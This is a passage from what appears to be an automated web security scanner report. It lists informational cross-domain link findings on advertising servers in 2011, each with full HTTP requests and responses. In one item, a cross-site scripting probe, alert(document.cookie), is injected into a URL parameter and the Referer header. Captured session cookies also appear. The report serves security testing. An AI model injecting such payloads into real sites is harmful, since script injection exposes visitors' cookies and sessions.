0%3B41978481/41996268/1%3B%3B%7Eokv%3D%3Bsect%3Dros%3Bsz%3D160x600%3Btile%3D4%3B%7Eaopt%3D2/1/83/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/MSR/go/313679802/direct;wi.160;hi.600/01/6942356" target="_blank"><img src="http://view.atdmt.com/MSR/view/313679802/direct;wi.160;hi.600/01/6942356"/></a>
...[SNIP]...

18.193. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.sportsfanlive.com
Path:	/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06?XE&Partner=fansided&PartnerUnit=fansided.728x90.1.default/jx/solo&XE

The response contains the following link to another domain:

http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=728x90

Request

GET /RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06?XE&Partner=fansided&PartnerUnit=fansided.728x90.1.default/jx/solo&XE HTTP/1.1
Host: oascentral.sportsfanlive.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW80317igAAFTT; NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 205
Content-Type: application/x-javascript

document.write ('<script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=728x90"></script>\
...[SNIP]...

18.194. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.sportsfanlive.com
Path:	/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left?XE&Partner=fansided&PartnerUnit=fansided.160x600.1.default/jx/thirdparty&XE

The response contains the following link to another domain:

http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=160x600

Request

GET /RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left?XE&Partner=fansided&PartnerUnit=fansided.160x600.1.default/jx/thirdparty&XE HTTP/1.1
Host: oascentral.sportsfanlive.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW80317igAAFTT; NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 204
Content-Type: application/x-javascript

document.write ('<script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=160x600"></script>
...[SNIP]...

18.195. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.sportsfanlive.com
Path:	/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2?XE&Partner=fansided&PartnerUnit=fansided.300x250.1.default/jx/thirdparty&XE

The response contains the following link to another domain:

http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=300x250

Request

GET /RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2?XE&Partner=fansided&PartnerUnit=fansided.300x250.1.default/jx/thirdparty&XE HTTP/1.1
Host: oascentral.sportsfanlive.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 206
Content-Type: application/x-javascript

document.write ('<script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=300x250"></script>
...[SNIP]...

18.196. http://open.ad.yieldmanager.net/a1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://open.ad.yieldmanager.net
Path:	/a1

Issue detail

The page was loaded from a URL containing a query string:

http://open.ad.yieldmanager.net/a1?V=4&pubId=22231017672&site=thesouthern.com&cntTy=js&cTopId=20357001&cSctn=non-index&ctLng=en-us&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.3%20r181&cb=1307962867187&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&sz0=728x90&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=88x31&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=300x250&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=300x250&dlv3=ipbtf&conTy3=fn_news&sltId3=3&sz4=300x600&dlv4=ipbtf&conTy4=fn_news&sltId4=4&sz5=800x600&dlv5=ipatf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=160x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=728x90&dlv9=ipbtf&conTy9=fn_news&sltId9=9&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112

The response contains the following link to another domain:

http://cookex.amp.yahoo.com/v2/cexposer/SIG=1vvehra8i/*http:/open.ad.yieldmanager.net/a1?V=4&pubId=22231017672&site=thesouthern.com&cntTy=js&cTopId=20357001&cSctn=non-index&ctLng=en-us&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.3%20r181&cb=1307962867187&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&sz0=728x90&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=88x31&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=300x250&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=300x250&dlv3=ipbtf&conTy3=fn_news&sltId3=3&sz4=300x600&dlv4=ipbtf&conTy4=fn_news&sltId4=4&sz5=800x600&dlv5=ipatf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=160x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=728x90&dlv9=ipbtf&conTy9=fn_news&sltId9=9&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112

Request

GET /a1?V=4&pubId=22231017672&site=thesouthern.com&cntTy=js&cTopId=20357001&cSctn=non-index&ctLng=en-us&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.3%20r181&cb=1307962867187&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&sz0=728x90&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=88x31&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=300x250&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=300x250&dlv3=ipbtf&conTy3=fn_news&sltId3=3&sz4=300x600&dlv4=ipbtf&conTy4=fn_news&sltId4=4&sz5=800x600&dlv5=ipatf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=160x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=728x90&dlv9=ipbtf&conTy9=fn_news&sltId9=9&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=146

Response

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:01:08 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=1vvehra8i/*http%3A//open.ad.yieldmanager.net/a1?V=4&pubId=22231017672&site=thesouthern.com&cntTy=js&cTopId=20357001&cSctn=non-index&ctLng=en-us&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.3%20r181&cb=1307962867187&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&sz0=728x90&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=88x31&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=300x250&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=300x250&dlv3=ipbtf&conTy3=fn_news&sltId3=3&sz4=300x600&dlv4=ipbtf&conTy4=fn_news&sltId4=4&sz5=800x600&dlv5=ipatf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=160x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=728x90&dlv9=ipbtf&conTy9=fn_news&sltId9=9&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 2025

The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=1vvehra8i/*http%3A//open.ad.yieldmanager.net/a1?V=4&pubId=22231017672&site=thesouthern.com&cntTy=js&cTopId=20357001&cSctn=non-index&ctLng=en-us&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.3%20r181&cb=1307962867187&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&sz0=728x90&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=88x31&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=300x250&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=300x250&dlv3=ipbtf&conTy3=fn_news&sltId3=3&sz4=300x600&dlv4=ipbtf&conTy4=fn_news&sltId4=4&sz5=800x600&dlv5=ipatf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=160x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=728x90&dlv9=ipbtf&conTy9=fn_news&sltId9=9&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112">here</A>
...[SNIP]...

18.197. http://open.ad.yieldmanager.net/a1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://open.ad.yieldmanager.net
Path:	/a1

Issue detail

The page was loaded from a URL containing a query string:

http://open.ad.yieldmanager.net/a1?V=4&pubId=22231017672&site=thesouthern.com&cntTy=js&cTopId=20357001&cSctn=non-index&ctLng=en-us&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.3%20r181&cb=1307963157325&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2%3D1&sz0=728x90&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=88x31&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=300x250&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=300x250&dlv3=ipbtf&conTy3=fn_news&sltId3=3&sz4=300x600&dlv4=ipbtf&conTy4=fn_news&sltId4=4&sz5=800x600&dlv5=ipatf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=160x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=728x90&dlv9=ipbtf&conTy9=fn_news&sltId9=9&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112

The response contains the following link to another domain:

http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19320&clickTagURL=http://www.facebook.com/pages/Cheveux-Salon/131389290258230&mouseAction=mouseOver

Request

GET /a1?V=4&pubId=22231017672&site=thesouthern.com&cntTy=js&cTopId=20357001&cSctn=non-index&ctLng=en-us&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.3%20r181&cb=1307963157325&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2%3D1&sz0=728x90&dlv0=ipatf&conTy0=fn_news&sltId0=0&sz1=88x31&dlv1=ipatf&conTy1=fn_news&sltId1=1&sz2=300x250&dlv2=ipatf&conTy2=fn_news&sltId2=2&sz3=300x250&dlv3=ipbtf&conTy3=fn_news&sltId3=3&sz4=300x600&dlv4=ipbtf&conTy4=fn_news&sltId4=4&sz5=800x600&dlv5=ipatf&conTy5=fn_news&sltId5=5&sz6=120x90&dlv6=ipbtf&conTy6=fn_news&sltId6=6&sz7=120x90&dlv7=ipbtf&conTy7=fn_news&sltId7=7&sz8=160x600&dlv8=ipatf&conTy8=fn_news&sltId8=8&sz9=728x90&dlv9=ipbtf&conTy9=fn_news&sltId9=9&ref=http%3A%2F%2Fburp%2Fshow%2F0&byt=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=163; S=s=6qbh37l6vbrfl&t=1307962869

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:19:32 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 14119

(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"\u000a<img style=\"display:none\" width=0 height=0 alt=\"\"
...[SNIP]...
<div id='jivoxPlayer'><iframe src='http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19320&clickTagURL=http://www.facebook.com/pages/Cheveux-Salon/131389290258230&mouseAction=mouseOver' width='300' height='250' frameborder='0' scrolling='no' marginwidth='0' marginheight='0'></iframe>
...[SNIP]...

18.198. http://pagead2.googlesyndication.com/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://pagead2.googlesyndication.com/pagead/ads?client=ca-google-hostednews-ap&format=300x250_as&output=html&h=250&w=300&region=article&ad_type=text&ea=0&color_bg=FFFFFF&color_border=0066CC&color_line=FFFFFF&color_link=003399&color_text=000000&color_url=008000&flash=10.3.181&hl=en&url=http%3A%2F%2Fwww.google.com%2Fhostednews%2Fap%2Farticle%2FALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%3FdocId%3D06bdeb4400a149318fc82f3f073766d1&adsafe=high&uiv=1&dt=1307962865316&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307962867980&dblk=1&frm=7&adk=1012086373&ga_vid=1102445186.1307962863&ga_sid=1307962863&ga_hid=401672175&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ifk=2196030948&loc=http%3A%2F%2Fwww.google.com%2Fhostednews%2Fap%2Farticle%2FALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%3FdocId%3D06bdeb4400a149318fc82f3f073766d1&fu=4&ifi=1&dtd=3140

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%253FdocId%253D06bdeb4400a149318fc82f3f073766d1%26hl%3Den%26client%3Dca-google-hostednews-ap%26adU%3Dwww.csnbayarea.com%26adT%3DVladimir%2BRadmanovic%26adU%3Dwww.csnchicago.com%26adT%3DLatest%2BCarlos%2BBoozer%2BNews%26adU%3Dwww.AthletePromotions.com%26adT%3DMark%2BCuban%2BSpeaker%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNEBiQXU4hhIx1UxmBZHjziCn_J2pw

Request

GET /pagead/ads?client=ca-google-hostednews-ap&format=300x250_as&output=html&h=250&w=300&region=article&ad_type=text&ea=0&color_bg=FFFFFF&color_border=0066CC&color_line=FFFFFF&color_link=003399&color_text=000000&color_url=008000&flash=10.3.181&hl=en&url=http%3A%2F%2Fwww.google.com%2Fhostednews%2Fap%2Farticle%2FALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%3FdocId%3D06bdeb4400a149318fc82f3f073766d1&adsafe=high&uiv=1&dt=1307962865316&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307962867980&dblk=1&frm=7&adk=1012086373&ga_vid=1102445186.1307962863&ga_sid=1307962863&ga_hid=401672175&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ifk=2196030948&loc=http%3A%2F%2Fwww.google.com%2Fhostednews%2Fap%2Farticle%2FALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%3FdocId%3D06bdeb4400a149318fc82f3f073766d1&fu=4&ifi=1&dtd=3140 HTTP/1.1
Host: pagead2.googlesyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:01:19 GMT
Server: cafe
Cache-Control: private
Content-Length: 11298
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003399;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg%253FdocId%253D06bdeb4400a149318fc82f3f073766d1%26hl%3Den%26client%3Dca-google-hostednews-ap%26adU%3Dwww.csnbayarea.com%26adT%3DVladimir%2BRadmanovic%26adU%3Dwww.csnchicago.com%26adT%3DLatest%2BCarlos%2BBoozer%2BNews%26adU%3Dwww.AthletePromotions.com%26adT%3DMark%2BCuban%2BSpeaker%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNEBiQXU4hhIx1UxmBZHjziCn_J2pw" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" width=78>
...[SNIP]...

18.199. http://pagead2.googlesyndication.com/pagead/ads previous next

Summary

Severity:	Information
